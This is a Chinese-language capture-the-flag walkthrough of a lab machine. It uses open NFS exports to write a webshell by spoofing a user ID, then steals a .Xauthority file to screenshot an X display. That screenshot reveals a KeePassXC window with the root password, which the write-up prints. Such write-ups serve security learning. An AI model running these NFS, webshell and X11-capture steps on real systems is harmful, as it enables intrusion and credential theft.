基本信息

端口扫描

22,80,111,2049:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
$ nmap -sC -sV -Pn 10.10.11.191
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-23 10:02 CST
Nmap scan report for 10.10.11.191
Host is up (0.19s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      42739/tcp6  mountd
|   100005  1,2,3      45443/tcp   mountd
|   100005  1,2,3      58177/udp6  mountd
|   100005  1,2,3      60862/udp   mountd
|   100021  1,3,4      36049/udp   nlockmgr
|   100021  1,3,4      36287/tcp6  nlockmgr
|   100021  1,3,4      37279/tcp   nlockmgr
|   100021  1,3,4      44346/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp open  nfs_acl 3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.04 seconds

80

家具相关的:

2049 nfs

nfs可以访问到两个目录:

1
2
3
4
5
6
7
8
9
10
$ showmount -e 10.10.11.191
Exports list on 10.10.11.191:
/home/ross                          *
/var/www/html                       *

mkdir ross
mkdir html
# mac上的mount命令
sudo mount -o resvport,rw,nolocks  -t nfs  10.10.11.191:/home/ross ross
sudo mount -o resvport,rw,nolocks  -t nfs  10.10.11.191:/var/www/html html

webshell

html就是web住目录,通过nfs写webshell,因为对应目录的uid是2017,我们需要新建一个对应id的用户:

1
2
3
4
5
6
7
8
$ ls -ld html
drwxr-xr--  5 2017  _appstore  4096 12 23 10:10 html

sudo useradd dummy
sudo usermod -u 2017 dummy 
sudo su dummy -c bash

echo xxx > shell.php

user flag

webshell是alex权限,常规shell,user flag:

提权信息

ross用户目录发现有.Xauthority文件,我们可以通过NFS下载下来后放到alex用户目录,然后查看信息可以发现keepass密码:

1
2
3
4
5
w
XAUTHORITY=/tmp/.Xauthority xdpyinfo -display :0
XAUTHORITY=/tmp/.Xauthority xwininfo -root -tree -display :0

Keepassxc

截屏可以得到解密的keepass界面,得到root密码:

1
2
3
4
5
6
XAUTHORITY=/tmp/.Xauthority xwd -root -screen -silent -display :0 > /tmp/miao.xwd

sudo apt install imagemagick
convert screenshot.xwd screenshot.png

cah$mei7rai9A

root flag

root ssh登录:

参考资料